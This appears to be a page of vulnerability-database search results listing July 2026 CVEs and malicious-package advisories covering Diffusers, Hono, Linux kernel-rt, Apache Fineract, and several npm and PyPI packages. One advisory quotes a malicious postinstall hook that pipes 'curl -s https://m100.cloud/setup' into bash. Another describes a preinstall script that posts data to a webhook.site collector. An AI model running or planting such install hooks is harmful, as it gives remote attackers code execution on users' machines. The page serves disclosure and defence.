Lucene search
+L

29628 matches found

OSV
OSV
added 2026/07/15 4:5 p.m.13 views

CVE-2026-45804 Diffusers: TOCTOU Trust Remote Code Bypass

Diffusers is the a library for pretrained diffusion models. Prior to 0.38.0, Diffusers' DiffusionPipeline.frompretrained flow can bypass the trustremotecode guard because download validates modelindex.json and custom pipeline code before later loading from a cached folder that can change, allowin...

7.5CVSS6.2AI score
SaveExploits0References7
CVE
CVE
added 2026/07/15 4:5 p.m.86 views

CVE-2026-45804

Diffusers CVE-2026-45804 describes a TOCTOU race in DiffusionPipeline.from_pretrained where two Hub fetches (config via hf_hub_download and a snapshot via snapshot_download) can resolve to different commits. An attacker could push commit B after the first check, causing the newer commit’s model_i...

7.5CVSS6.2AI score0.00268EPSS
SaveExploits0References5
OSV
OSV
added 2026/07/15 3:45 p.m.8 views

MAL-2026-10682 Malicious code in code-formatter-setup (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 29eac23cdb5855a900e15c2d86231de29d9985573f90f819f9d4ba08425b9042 package.json declares a postinstall lifecycle hook that runs node -e "require'childprocess'.execSync'curl -s https://m100.cloud/setup | bash'",...

6.1AI score
SaveExploits0References1
Circl
Circl
added 2026/07/15 2:20 p.m.11 views

CVE-2026-14354

creationtimestamp| type| source ---|---|--- 2026-07-15 14:20:14+00:00| seen| https://bsky.app/profile/o2cloud.bsky.social/post/3mqow4t54qn2f 2026-07-29 16:03:24+00:00| seen| https://bsky.app/profile/cve.skyfleet.blue/post/3mrscg7ehc52b...

8.7CVSS7.1AI score0.00117EPSS
SaveExploits0References2
Circl
Circl
added 2026/07/15 2:15 p.m.15 views

CVE-2026-53566

creationtimestamp| type| source ---|---|--- 2026-07-15 14:15:26+00:00| seen| https://bsky.app/profile/o2cloud.bsky.social/post/3mqovu3ew4h2c 2026-07-15 16:15:13+00:00| seen| https://cyber.gc.ca/en/alerts-advisories/citrix-security-advisory-av26-702 2026-07-17 13:02:33+00:00| seen|...

6.8CVSS4.8AI score0.00166EPSS
SaveExploits0References5
RedHat Linux
RedHat Linux
added 2026/07/15 1:48 p.m.28 views

kernel: rtmutex: Use waiter::task instead of current in remove_waiter()

A flaw was found in the Linux kernel. When the kernel's real-time mutex rtmutex component performs a specific operation called 'proxy-lock rollback' during futex requeue, it incorrectly handles task pointers. This can lead to a 'Use-After-Free' UAF vulnerability, where the system attempts to use...

7.8CVSS6.7AI score0.00725EPSS
SaveExploits55References6
RedHat Linux
RedHat Linux
added 2026/07/15 1:48 p.m.8 views

Moderate: Red Hat Security Advisory: kernel-rt security update

An update for kernel-rt is now available for Red Hat Enterprise Linux 9.2 Update Services for SAP Solutions. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System CVSS base score, which gives a detailed severity rating, is...

8.8CVSS6.4AI score0.00908EPSS
SaveExploits60References6
RedHat Linux
RedHat Linux
added 2026/07/15 1:47 p.m.16 views

kernel: rtmutex: Use waiter::task instead of current in remove_waiter()

A flaw was found in the Linux kernel. When the kernel's real-time mutex rtmutex component performs a specific operation called 'proxy-lock rollback' during futex requeue, it incorrectly handles task pointers. This can lead to a 'Use-After-Free' UAF vulnerability, where the system attempts to use...

7.8CVSS6.7AI score0.00725EPSS
SaveExploits55References6
Circl
Circl
added 2026/07/15 1:40 p.m.13 views

CVE-2026-59236

creationtimestamp| type| source ---|---|--- 2026-07-15 13:40:10+00:00| seen| https://bsky.app/profile/cve.skyfleet.blue/post/3mqotv6s2dw2n...

6.9CVSS6.1AI score0.0047EPSS
SaveExploits0References1
NVD
NVD
added 2026/07/15 12:18 p.m.17 views

CVE-2026-56764

Hono before 4.11.10 contains a timing attack vulnerability in the basicAuth and bearerAuth middlewares due to non-constant-time string comparison in the timingSafeEqual function. Attackers can exploit early termination of string equality checks to infer valid credentials through precise timing...

6.3CVSS0.00229EPSS
SaveExploits0References2
Rockylinux
Rockylinux
added 2026/07/15 12:1 p.m.11 views

kernel-rt security update

An update is available for kernel-rt. This update affects Rocky Linux 8. A Common Vulnerability Scoring System CVSS base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list The kernel-rt packages provide the Real Time Linux Kernel, which enables...

7.8CVSS6.7AI score0.00507EPSS
SaveExploits7
OSV
OSV
added 2026/07/15 12:1 p.m.12 views

RLSA-2026:39180 Important: kernel-rt security update

The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements. Security Fixes: kernel: net: bridge: use a stable FDB dst snapshot in RCU readers CVE-2026-46086 kernel: xfrm: defensively unhash xfrmstate lists in...

7CVSS6.7AI score0.0013EPSS
SaveExploits1References3
ATTACKERKB
ATTACKERKB
added 2026/07/15 11:25 a.m.9 views

CVE-2026-56764

Hono before 4.11.10 contains a timing attack vulnerability in the basicAuth and bearerAuth middlewares due to non-constant-time string comparison in the timingSafeEqual function. Attackers can exploit early termination of string equality checks to infer valid credentials through precise timing...

6.3CVSS6.1AI score0.00229EPSS
SaveExploits0References3
OSV
OSV
added 2026/07/15 11:25 a.m.8 views

CVE-2026-56764 Hono - Timing Attack in basicAuth and bearerAuth Middleware

Hono before 4.11.10 contains a timing attack vulnerability in the basicAuth and bearerAuth middlewares due to non-constant-time string comparison in the timingSafeEqual function. Attackers can exploit early termination of string equality checks to infer valid credentials through precise timing...

6.3CVSS6.1AI score
SaveExploits0References4
EUVD
EUVD
added 2026/07/15 11:25 a.m.10 views

EUVD-2026-44631

Hono before 4.11.10 contains a timing attack vulnerability in the basicAuth and bearerAuth middlewares due to non-constant-time string comparison in the timingSafeEqual function. Attackers can exploit early termination of string equality checks to infer valid credentials through precise timing...

6.3CVSS6.1AI score0.00229EPSS
SaveExploits0References2
Cvelist
Cvelist
added 2026/07/15 11:25 a.m.38 views

CVE-2026-56764 Hono - Timing Attack in basicAuth and bearerAuth Middleware

Hono before 4.11.10 contains a timing attack vulnerability in the basicAuth and bearerAuth middlewares due to non-constant-time string comparison in the timingSafeEqual function. Attackers can exploit early termination of string equality checks to infer valid credentials through precise timing...

6.3CVSS0.00229EPSS
SaveExploits0References2
OSV
OSV
added 2026/07/15 10:42 a.m.10 views

MAL-2026-10676 Malicious code in commonjs-assert (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector b7fa2454998144bffed3fc1e2d73046b8414179b59fb99d3339f2658e00637f7 The package name resembles Node.js's built-in assert module. On require, index.js spawns a detached node child process against...

6.6AI score
SaveExploits0References1
OSV
OSV
added 2026/07/15 10:39 a.m.9 views

MAL-2026-10675 Malicious code in ac-raf-emitter (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 4a9d9e454c08fdafa531ee74a3bc52513d5bc39413810db4a6371494872984f8 package.json declares a preinstall lifecycle script that runs curl -X POST against a hardcoded webhook.site collector URL...

6.2AI score
SaveExploits0References1
NVD
NVD
added 2026/07/15 10:16 a.m.12 views

CVE-2026-57821

A SQL Injection vulnerability exists in Apache Fineract's Office Search API GET /api/v1/offices in versions up to and including 1.14.0. The orderBy request parameter is concatenated into a SQL query without sufficient validation, allowing an authenticated user with permission to view offices to...

8.1CVSS0.00844EPSS
SaveExploits1References3
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/07/15 10:15 a.m.20 views

Malicious code in northstart-sdk (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector aa58bcfb4f89faf624c1f99bb552e597cc2e061330a2e98e72e6f401bb70b4f9 The pypi package northstart-sdk 0.2.1 executes attacker-controlled code as a side effect of import northstartsdk. The top-level init.py assigns...

6.3AI score
SaveExploits0References5
Rows per page
Query Builder